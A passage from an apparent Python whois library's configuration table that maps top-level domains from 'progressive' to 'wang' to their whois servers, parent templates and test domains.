\"_server\": \"whois.nic.google\"}\nZZ[\"progressive\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"promo\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.promo\", \"_test\": \"nic.promo\"}\nZZ[\"properties\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"property\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"protection\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"pr\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ps\"] = {\"_privateRegistry\": True} # no host can be contacted only http://www.nic.ps\nZZ[\"pub\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"pwc\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"py\"] = {\"extend\": \"_privateReg\"} # Paraguay\nZZ[\"qa\"] = {\"_server\": \"whois.registry.qa\", \"extend\": \"com\"}\nZZ[\"qpon\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"quebec\"] = {\"_server\": \"whois.nic.quebec\", \"extend\": \"com\", 
\"_test\": \"nic.quebec\"}\nZZ[\"quest\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"racing\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.racing\", \"_test\": \"nic.racing\"}\nZZ[\"radio\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.radio\", \"_test\": \"nic.radio\"}\nZZ[\"read\"] = {\"_server\": \"whois.nic.read\", \"extend\": \"com\", \"_test\": \"nic.read\"}\nZZ[\"realestate\"] = {\"_server\": \"whois.nic.realestate\", \"extend\": \"com\", \"_test\": \"nic.realestate\"}\nZZ[\"realty\"] = {\"_server\": \"whois.nic.realty\", \"extend\": \"com\", \"_test\": \"nic.realty\"}\nZZ[\"recipes\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"red\"] = {\"extend\": \"com\"}\nZZ[\"redstone\"] = {\"_server\": \"whois.nic.redstone\", \"extend\": \"com\", \"_test\": \"nic.redstone\"}\nZZ[\"redumbrella\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"rehab\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"reise\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"reisen\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"reit\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"reliance\"] = {\"_server\": \"whois.nic.reliance\", \"extend\": \"com\", \"_test\": \"nic.reliance\"}\nZZ[\"ren\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.ren\", \"_test\": \"nic.ren\"}\nZZ[\"rentals\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"rent\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"repair\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"report\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"republican\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"restaurant\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"rest\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"review\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.review\", \"_test\": \"nic.review\"}\nZZ[\"reviews\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"rexroth\"] = {\"_server\": \"whois.nic.rexroth\", \"extend\": \"com\", \"_test\": \"nic.rexroth\"}\nZZ[\"richardli\"] = {\"_server\": \"whois.nic.richardli\", \"extend\": \"com\", \"_test\": \"nic.richardli\"}\nZZ[\"rich\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ricoh\"] = {\"_server\": \"whois.nic.ricoh\", \"extend\": \"com\", \"_test\": \"nic.ricoh\"}\nZZ[\"ril\"] = {\"_server\": \"whois.nic.ril\", \"extend\": \"com\", \"_test\": \"nic.ril\"}\nZZ[\"rio\"] = {\"_server\": \"whois.gtlds.nic.br\", \"extend\": \"bom\"}\nZZ[\"rip\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"rocks\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"rodeo\"] = {\"_server\": \"whois.nic.rodeo\", \"extend\": \"com\", \"_test\": \"nic.rodeo\"}\nZZ[\"rogers\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"room\"] = {\"_server\": \"whois.nic.room\", \"extend\": \"com\", \"_test\": \"nic.room\"}\nZZ[\"rsvp\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"rugby\"] = {\"_server\": \"whois.nic.rugby\", \"extend\": \"com\", \"_test\": \"nic.rugby\"}\nZZ[\"ruhr\"] = {\"_server\": \"whois.nic.ruhr\", \"extend\": \"com\", \"_test\": \"nic.ruhr\"}\nZZ[\"run\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ru.rf\"] = 
{\"extend\": \"ru\"}\nZZ[\"rwe\"] = {\"_server\": \"whois.nic.rwe\", \"extend\": \"com\", \"_test\": \"nic.rwe\"}\nZZ[\"rw\"] = {\"extend\": \"com\", \"_server\": \"whois.ricta.org.rw\"}\nZZ[\"ryukyu\"] = {\"_server\": \"whois.nic.ryukyu\", \"extend\": \"com\", \"_test\": \"nic.ryukyu\"}\nZZ[\"saarland\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"safe\"] = {\"_server\": \"whois.nic.safe\", \"extend\": \"com\", \"_test\": \"nic.safe\"}\nZZ[\"safety\"] = {\"_server\": \"whois.nic.safety\", \"extend\": \"com\", \"_test\": \"nic.safety\"}\nZZ[\"sale\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"salon\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"samsclub\"] = {\"_server\": \"whois.nic.samsclub\", \"extend\": \"com\", \"_test\": \"nic.samsclub\"}\nZZ[\"samsung\"] = {\"_server\": \"whois.nic.samsung\", \"extend\": \"com\", \"_test\": \"nic.samsung\"}\nZZ[\"sandvikcoromant\"] = {\"_server\": \"whois.nic.sandvikcoromant\", \"extend\": \"com\", \"_test\": \"nic.sandvikcoromant\"}\nZZ[\"sandvik\"] = {\"_server\": \"whois.nic.sandvik\", \"extend\": \"com\", \"_test\": \"nic.sandvik\"}\nZZ[\"sanofi\"] = {\"_server\": \"whois.nic.sanofi\", \"extend\": \"com\", \"_test\": \"nic.sanofi\"}\nZZ[\"sap\"] = {\"_server\": \"whois.nic.sap\", \"extend\": \"com\", \"_test\": \"nic.sap\"}\nZZ[\"sarl\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"save\"] = {\"_server\": \"whois.nic.save\", \"extend\": \"com\", \"_test\": \"nic.save\"}\nZZ[\"saxo\"] = {\"_server\": \"whois.nic.saxo\", \"extend\": \"com\", \"_test\": \"nic.saxo\"}\nZZ[\"sb\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.net.sb\"}\nZZ[\"sbi\"] = {\"_server\": \"whois.nic.sbi\", \"extend\": \"com\", \"_test\": \"nic.sbi\"}\nZZ[\"sbs\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"sca\"] = {\"_server\": \"whois.nic.sca\", \"extend\": \"com\", \"_test\": \"nic.sca\"}\nZZ[\"scb\"] = {\"_server\": \"whois.nic.scb\", \"extend\": \"com\", \"_test\": \"nic.scb\"}\nZZ[\"schaeffler\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"schmidt\"] = {\"_server\": \"whois.nic.schmidt\", \"extend\": \"com\", \"_test\": \"nic.schmidt\"}\nZZ[\"scholarships\"] = {\"_server\": \"whois.nic.scholarships\", \"extend\": \"com\", \"_test\": \"nic.scholarships\"}\nZZ[\"school\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"schule\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"schwarz\"] = {\"_server\": \"whois.nic.schwarz\", \"extend\": \"com\", \"_test\": \"nic.schwarz\"}\nZZ[\"science\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.science\", \"_test\": \"nic.science\"}\nZZ[\"sc.ke\"] = {\"extend\": \"ke\"}\nZZ[\"scot\"] = {\"_server\": \"whois.nic.scot\", \"extend\": \"com\", \"_test\": \"nic.scot\"}\nZZ[\"sc\"] = {\"_server\": \"whois2.afilias-grs.net\", \"extend\": \"com\"}\nZZ[\"sd\"] = {\"extend\": \"com\", \"_server\": \"whois.sdnic.sd\"}\nZZ[\"search\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"seat\"] = {\"_server\": \"whois.nic.seat\", \"extend\": \"com\", \"_test\": \"nic.seat\"}\nZZ[\"secure\"] = {\"_server\": \"whois.nic.secure\", \"extend\": \"com\", \"_test\": \"nic.secure\"}\nZZ[\"security\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"seek\"] = {\"_server\": \"whois.nic.seek\", \"extend\": \"com\", \"_test\": \"nic.seek\"}\nZZ[\"select\"] = {\"_server\": \"whois.nic.select\", \"extend\": 
\"com\", \"_test\": \"nic.select\"}\nZZ[\"한국\"] = {\"_server\": \"whois.kr\", \"extend\": \"kr\"}\nZZ[\"삼성\"] = {\"_server\": \"whois.kr\", \"extend\": \"kr\"}\nZZ[\"닷컴\"] = {\"_server\": \"whois.nic.xn--mk1bu44c\", \"extend\": \"xn--mk1bu44c\"}\nZZ[\"닷넷\"] = {\"_server\": \"whois.nic.xn--t60b56a\", \"extend\": \"xn--t60b56a\"}\nZZ[\"services\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"seven\"] = {\"_server\": \"whois.nic.seven\", \"extend\": \"com\", \"_test\": \"nic.seven\"}\nZZ[\"sew\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"sex\"] = {\"_server\": \"whois.nic.sex\", \"extend\": \"com\", \"_test\": \"nic.sex\"}\nZZ[\"sexy\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"sfr\"] = {\"_server\": \"whois.nic.sfr\", \"extend\": \"com\", \"_test\": \"nic.sfr\"}\nZZ[\"shangrila\"] = {\"_server\": \"whois.nic.shangrila\", \"extend\": \"com\", \"_test\": \"nic.shangrila\"}\nZZ[\"sharp\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"shaw\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"shell\"] = {\"_server\": \"whois.nic.shell\", \"extend\": \"com\", \"_test\": \"nic.shell\"}\nZZ[\"shia\"] = {\"_server\": \"whois.nic.shia\", \"extend\": \"com\", \"_test\": \"nic.shia\"}\nZZ[\"shiksha\"] = {\"_server\": \"whois.nic.shiksha\", \"extend\": \"com\", \"_test\": \"nic.shiksha\"}\nZZ[\"shoes\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"shop\"] = {\"extend\": \"com\"}\nZZ[\"shopping\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"shouji\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"show\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"showtime\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"silk\"] = {\"_server\": \"whois.nic.silk\", \"extend\": \"com\", \"_test\": \"nic.silk\"}\nZZ[\"sina\"] = {\"_server\": \"whois.nic.sina\", \"extend\": \"com\", \"_test\": \"nic.sina\"}\nZZ[\"singles\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"site\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"skin\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"ski\"] = {\"_server\": \"whois.nic.ski\", \"extend\": \"com\", \"_test\": \"nic.ski\"}\nZZ[\"sky\"] = {\"_server\": \"whois.nic.sky\", \"extend\": \"com\", \"_test\": \"nic.sky\"}\nZZ[\"sl\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.sl\", \"_test\": \"nic.sl\"}\nZZ[\"sling\"] = {\"_server\": \"whois.nic.sling\", \"extend\": \"com\", \"_test\": \"nic.sling\"}\nZZ[\"smart\"] = {\"_server\": \"whois.nic.smart\", \"extend\": \"com\", \"_test\": \"nic.smart\"}\nZZ[\"smile\"] = {\"_server\": \"whois.nic.smile\", \"extend\": \"com\", \"_test\": \"nic.smile\"}\nZZ[\"sncf\"] = {\"_server\": \"whois.nic.sncf\", \"extend\": \"com\", \"_test\": \"nic.sncf\"}\nZZ[\"soccer\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"social\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"so\"] = {\"extend\": \"com\"}\nZZ[\"softbank\"] = {\"_server\": \"whois.nic.softbank\", \"extend\": \"com\", \"_test\": \"nic.softbank\"}\nZZ[\"software\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"solar\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"solutions\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"sony\"] = {\"_server\": \"whois.nic.sony\", 
\"extend\": \"com\", \"_test\": \"nic.sony\"}\nZZ[\"soy\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"space\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"spa\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"spb.ru\"] = {\"extend\": \"com.ru\", \"_test\": \"iac.spb.ru\"}\nZZ[\"sport\"] = {\"_server\": \"whois.nic.sport\", \"extend\": \"com\", \"_test\": \"nic.sport\"}\nZZ[\"spot\"] = {\"_server\": \"whois.nic.spot\", \"extend\": \"com\", \"_test\": \"nic.spot\"}\nZZ[\"sr\"] = {\"extend\": \"_privateReg\"}\nZZ[\"srl\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"ac\", \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\")}\nZZ[\"ss\"] = {\"_server\": \"whois.nic.ss\", \"extend\": \"com\", \"_test\": \"nic.ss\"}\nZZ[\"stada\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"star\"] = {\"_server\": \"whois.nic.star\", \"extend\": \"com\", \"_test\": \"nic.star\"}\nZZ[\"statebank\"] = {\"_server\": \"whois.nic.statebank\", \"extend\": \"com\", \"_test\": \"nic.statebank\"}\nZZ[\"stcgroup\"] = {\"_server\": \"whois.nic.stcgroup\", \"extend\": \"com\", \"_test\": \"nic.stcgroup\"}\nZZ[\"stc\"] = {\"_server\": \"whois.nic.stc\", \"extend\": \"com\", \"_test\": \"nic.stc\"}\nZZ[\"stockholm\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"storage\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"store\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"stream\"] = {\"_server\": \"whois.nic.stream\", \"extend\": \"com\", \"_test\": \"nic.stream\"}\nZZ[\"studio\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"study\"] = {\"extend\": \"com\"}\nZZ[\"style\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"sucks\"] = {\"_server\": \"whois.nic.sucks\", \"extend\": \"com\", \"_test\": \"nic.sucks\"}\nZZ[\"su\"] = {\"extend\": \"ru\"}\nZZ[\"supplies\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"supply\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"support\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"surf\"] = {\"_server\": \"whois.nic.surf\", \"extend\": \"com\", \"_test\": \"nic.surf\"}\nZZ[\"surgery\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"suzuki\"] = {\"_server\": \"whois.nic.suzuki\", \"extend\": \"com\", \"_test\": \"nic.suzuki\"}\nZZ[\"sv\"] = {\"_privateRegistry\": True}\nZZ[\"swatch\"] = {\"_server\": \"whois.nic.swatch\", \"extend\": \"com\", \"_test\": \"nic.swatch\"}\nZZ[\"swiss\"] = {\"_server\": \"whois.nic.swiss\", \"extend\": \"com\", \"_test\": \"nic.swiss\"}\nZZ[\"sx\"] = {\"extend\": \"com\", \"_server\": \"whois.sx\"}\nZZ[\"sydney\"] = {\"_server\": \"whois.nic.sydney\", \"extend\": \"com\", \"_test\": \"nic.sydney\"}\nZZ[\"sy\"] = {\"extend\": \"com\", \"_server\": \"whois.tld.sy\", \"_test\": \"tld.sy\"}\nZZ[\"systems\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tab\"] = {\"_server\": \"whois.nic.tab\", \"extend\": \"com\", \"_test\": \"nic.tab\"}\nZZ[\"taipei\"] = {\"_server\": \"whois.nic.taipei\", \"extend\": \"com\", \"_test\": \"nic.taipei\"}\nZZ[\"talk\"] = {\"_server\": \"whois.nic.talk\", \"extend\": \"com\", \"_test\": \"nic.talk\"}\nZZ[\"taobao\"] = {\"_server\": \"whois.nic.taobao\", \"extend\": \"com\", \"_test\": \"nic.taobao\"}\nZZ[\"tatamotors\"] = {\"_server\": \"whois.nic.tatamotors\", \"extend\": 
\"com\", \"_test\": \"nic.tatamotors\"}\nZZ[\"tatar\"] = {\"_server\": \"whois.nic.tatar\", \"extend\": \"com\", \"_test\": \"nic.tatar\"}\nZZ[\"tattoo\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"tax\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"taxi\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tci\"] = {\"_server\": \"whois.nic.tci\", \"extend\": \"com\", \"_test\": \"nic.tci\"}\nZZ[\"tdk\"] = {\"_server\": \"whois.nic.tdk\", \"extend\": \"com\", \"_test\": \"nic.tdk\"}\nZZ[\"td\"] = {\"_server\": \"whois.nic.td\", \"extend\": \"ac\", \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\"), \"_test\": \"nic.td\"}\nZZ[\"team\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tech\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"technology\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"temasek\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"tennis\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"teva\"] = {\"_server\": \"whois.nic.teva\", \"extend\": \"com\", \"_test\": \"nic.teva\"}\nZZ[\"tf\"] = {\"extend\": \"re\", \"_server\": \"whois.nic.tf\", \"_test\": \"nic.tf\"}\nZZ[\"thd\"] = {\"_server\": \"whois.nic.thd\", \"extend\": \"com\", \"_test\": \"nic.thd\"}\nZZ[\"theater\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"theatre\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"th\"] = {\"_server\": \"whois.thnic.co.th\", \"extend\": \"co.th\", \"_test\": \"thnic.co.th\"}\nZZ[\"tiaa\"] = {\"_server\": \"whois.nic.tiaa\", \"extend\": \"com\", \"_test\": \"nic.tiaa\"}\nZZ[\"tickets\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"tienda\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tips\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tires\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tirol\"] = {\"_server\": \"whois.nic.tirol\", \"extend\": \"com\", \"_test\": \"nic.tirol\"}\nZZ[\"tk\"] = {\"extend\": \"_privateReg\"}\nZZ[\"tl\"] = {\"extend\": \"com\"}\nZZ[\"tmall\"] = {\"_server\": \"whois.nic.tmall\", \"extend\": \"com\", \"_test\": \"nic.tmall\"}\nZZ[\"today\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"to\"] = {\"extend\": \"_privateReg\"}\nZZ[\"tokyo\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.tokyo\", \"_test\": \"nic.tokyo\"}\nZZ[\"tools\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"top\"] = {\"extend\": \"com\"}\nZZ[\"toray\"] = {\"_server\": \"whois.nic.toray\", \"extend\": \"com\", \"_test\": \"nic.toray\"}\nZZ[\"toshiba\"] = {\"_server\": \"whois.nic.toshiba\", \"extend\": \"com\", \"_test\": \"nic.toshiba\"}\nZZ[\"total\"] = {\"_server\": \"whois.nic.total\", \"extend\": \"com\", \"_test\": \"nic.total\"}\nZZ[\"tours\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"town\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"toyota\"] = {\"_server\": \"whois.nic.toyota\", \"extend\": \"com\", \"_test\": \"nic.toyota\"}\nZZ[\"toys\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"trade\"] = {\"extend\": \"amsterdam\"}\nZZ[\"trading\"] = {\"_server\": \"whois.nic.trading\", \"extend\": \"com\", \"_test\": \"nic.trading\"}\nZZ[\"training\"] = {\"extend\": \"_donuts\", \"_server\": 
\"whois.donuts.co\"}\nZZ[\"travelersinsurance\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"travelers\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"travel\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tr\"] = {\"extend\": \"_privateReg\"}\nZZ[\"trust\"] = {\"_server\": \"whois.nic.trust\", \"extend\": \"com\", \"_test\": \"nic.trust\"}\nZZ[\"trv\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"tt\"] = {\"extend\": \"_privateReg\"}\nZZ[\"tube\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.tube\", \"_test\": \"nic.tube\"}\nZZ[\"tui\"] = {\"_server\": \"whois.nic.tui\", \"extend\": \"com\", \"_test\": \"nic.tui\"}\nZZ[\"tunes\"] = {\"_server\": \"whois.nic.tunes\", \"extend\": \"com\", \"_test\": \"nic.tunes\"}\nZZ[\"tushu\"] = {\"_server\": \"whois.nic.tushu\", \"extend\": \"com\", \"_test\": \"nic.tushu\"}\nZZ[\"tvs\"] = {\"_server\": \"whois.nic.tvs\", \"extend\": \"com\", \"_test\": \"nic.tvs\"}\nZZ[\"ubank\"] = {\"_server\": \"whois.nic.ubank\", \"extend\": \"com\", \"_test\": \"nic.ubank\"}\nZZ[\"ubs\"] = {\"_server\": \"whois.nic.ubs\", \"extend\": \"com\", \"_test\": \"nic.ubs\"}\nZZ[\"unicom\"] = {\"_server\": \"whois.nic.unicom\", \"extend\": \"com\", \"_test\": \"nic.unicom\"}\nZZ[\"university\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"uno\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"uol\"] = {\"_server\": \"whois.gtlds.nic.br\", \"extend\": \"bom\"}\nZZ[\"ups\"] = {\"_server\": \"whois.nic.ups\", \"extend\": \"com\", \"_test\": \"nic.ups\"}\nZZ[\"us\"] = {\"extend\": \"name\"}\nZZ[\"uy\"] = {\"extend\": \"_privateReg\"} # Uruguay\nZZ[\"vacations\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"va\"] = {\"extend\": \"_privateReg\"} # This TLD has no whois server.\nZZ[\"vana\"] = {\"_server\": \"whois.nic.vana\", \"extend\": \"com\", \"_test\": \"nic.vana\"}\nZZ[\"vanguard\"] = {\"_server\": \"whois.nic.vanguard\", \"extend\": \"com\", \"_test\": \"nic.vanguard\"}\nZZ[\"vc\"] = {\"extend\": \"com\"}\nZZ[\"vegas\"] = {\"_server\": \"whois.nic.vegas\", \"extend\": \"com\", \"_test\": \"nic.vegas\"}\nZZ[\"ventures\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"verisign\"] = {\"_server\": \"whois.nic.verisign\", \"extend\": \"com\", \"_test\": \"nic.verisign\"}\nZZ[\"vermögensberater\"] = {\"_server\": \"whois.nic.xn--vermgensberater-ctb\", \"extend\": \"xn--vermgensberater-ctb\"}\nZZ[\"vermögensberatung\"] = {\"_server\": \"whois.nic.xn--vermgensberatung-pwb\", \"extend\": \"xn--vermgensberatung-pwb\"}\nZZ[\"versicherung\"] = {\"_server\": \"whois.nic.versicherung\", \"extend\": \"com\", \"_test\": \"nic.versicherung\"}\nZZ[\"vet\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"vg\"] = {\"_server\": \"whois.nic.vg\", \"extend\": \"com\", \"_test\": \"nic.vg\"}\nZZ[\"viajes\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"video\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"vig\"] = {\"extend\": \"com\", \"_server\": \"whois.afilias-srs.net\"}\nZZ[\"vig\"] = {\"_server\": \"whois.nic.vig\", \"extend\": \"com\", \"_test\": \"nic.vig\"}\nZZ[\"viking\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"villas\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"vin\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"vip\"] = {\"_server\": 
\"whois.nic.vip\", \"extend\": \"com\", \"updated_date\": None, \"_test\": \"nic.vip\"}\nZZ[\"virgin\"] = {\"_server\": \"whois.nic.virgin\", \"extend\": \"com\", \"_test\": \"nic.virgin\"}\nZZ[\"visa\"] = {\"_server\": \"whois.nic.visa\", \"extend\": \"com\", \"_test\": \"nic.visa\"}\nZZ[\"vision\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"viva\"] = {\"_server\": \"whois.nic.viva\", \"extend\": \"com\", \"_test\": \"nic.viva\"}\nZZ[\"vlaanderen\"] = {\"_server\": \"whois.nic.vlaanderen\", \"extend\": \"com\", \"_test\": \"nic.vlaanderen\"}\nZZ[\"vn\"] = {\"extend\": \"_privateReg\"}\nZZ[\"vodka\"] = {\"_server\": \"whois.nic.vodka\", \"extend\": \"com\", \"_test\": \"nic.vodka\"}\nZZ[\"volkswagen\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"volvo\"] = {\"_server\": \"whois.nic.volvo\", \"extend\": \"com\", \"_test\": \"nic.volvo\"}\nZZ[\"vote\"] = {\"_server\": \"whois.nic.vote\", \"extend\": \"com\", \"_test\": \"nic.vote\"}\nZZ[\"voting\"] = {\"_server\": \"whois.nic.voting\", \"extend\": \"com\", \"_test\": \"nic.voting\"}\nZZ[\"voto\"] = {\"_server\": \"whois.nic.voto\", \"extend\": \"com\", \"_test\": \"nic.voto\"}\nZZ[\"voyage\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"vu\"] = {\"extend\": \"_privateReg\"} # all dates 1970 , no furter relevant info\nZZ[\"wales\"] = {\"_server\": \"whois.nic.wales\", \"extend\": \"com\", \"_test\": \"nic.wales\"}\nZZ[\"walmart\"] = {\"_server\": \"whois.nic.walmart\", \"extend\": \"com\", \"_test\": \"nic.walmart\"}\nZZ[\"walter\"] = {\"_server\": \"whois.nic.walter\", \"extend\": \"com\", \"_test\": \"nic.walter\"}\nZZ[\"wang\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": 